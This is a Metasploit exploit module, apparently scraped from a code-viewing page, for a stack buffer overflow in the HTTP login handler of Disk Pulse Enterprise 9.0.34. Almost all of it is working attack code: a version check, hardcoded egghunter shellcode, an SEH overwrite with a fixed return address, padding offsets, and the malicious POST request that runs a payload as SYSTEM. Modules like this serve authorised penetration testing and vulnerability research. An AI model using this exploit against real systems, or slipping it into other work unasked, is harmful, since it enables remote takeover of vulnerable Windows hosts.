Path: blob/master/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb
19567 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::Remote::Egghunter10include Msf::Exploit::Remote::Seh1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Disk Pulse Enterprise Login Buffer Overflow',17'Description' => %q{18This module exploits a stack buffer overflow in Disk Pulse Enterprise199.0.34. If a malicious user sends a malicious HTTP login request,20it is possible to execute a payload that would run under the Windows21NT AUTHORITY\SYSTEM account. Due to size constraints, this module22uses the Egghunter technique.23},24'License' => MSF_LICENSE,25'Author' => [26'Chris Higgins', # msf Module -- @ch1gg1ns27'Tulpa Security' # Original discovery -- @tulpa_security28],29'References' => [30[ 'EDB', '40452' ]31],32'DefaultOptions' => {33'EXITFUNC' => 'thread'34},35'Platform' => 'win',36'Payload' => {37'BadChars' => "\x00\x0a\x0d\x26"38},39'Targets' => [40[41'Disk Pulse Enterprise 9.0.34',42{43'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll44'Offset' => 1260045}46],47],48'Privileged' => true,49'DisclosureDate' => '2016-10-03',50'DefaultTarget' => 0,51'Notes' => {52'Reliability' => UNKNOWN_RELIABILITY,53'Stability' => UNKNOWN_STABILITY,54'SideEffects' => UNKNOWN_SIDE_EFFECTS55}56)57)5859register_options([Opt::RPORT(80)])60end6162def check63res = send_request_cgi({64'uri' => '/',65'method' => 'GET'66})6768if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.0\.34/69return Exploit::CheckCode::Appears70end7172return Exploit::CheckCode::Safe73end7475def exploit76connect77eggoptions =78{79:checksum => true,80:eggtag => "w00t"81}8283print_status("Generating exploit...")8485sploit = "username=admin"86sploit << "&password=aaaaa\r\n"8788# Would like to use generate_egghunter(), looking for improvement89egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"90egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"9192sploit << rand_text(target['Offset'] - payload.encoded.length)93sploit << "w00tw00t"94sploit << payload.encoded95sploit << make_nops(70)96sploit << rand_text(1614)97# Would like to use generate_seh_record(), looking for improvement98sploit << "\x90\x90\xEB\x0B"99sploit << "\x33\xA3\x01\x10"100sploit << make_nops(20)101sploit << egghunter102sploit << make_nops(7000)103104# Total exploit size should be 21747105print_status("Total exploit size: " + sploit.length.to_s)106print_status("Triggering the exploit now...")107print_status("Please be patient, the egghunter may take a while...")108109res = send_request_cgi({110'uri' => '/login',111'method' => 'POST',112'content-type' => 'application/x-www-form-urlencoded',113'content-length' => '17000',114'data' => sploit115})116117handler118disconnect119end120end121122123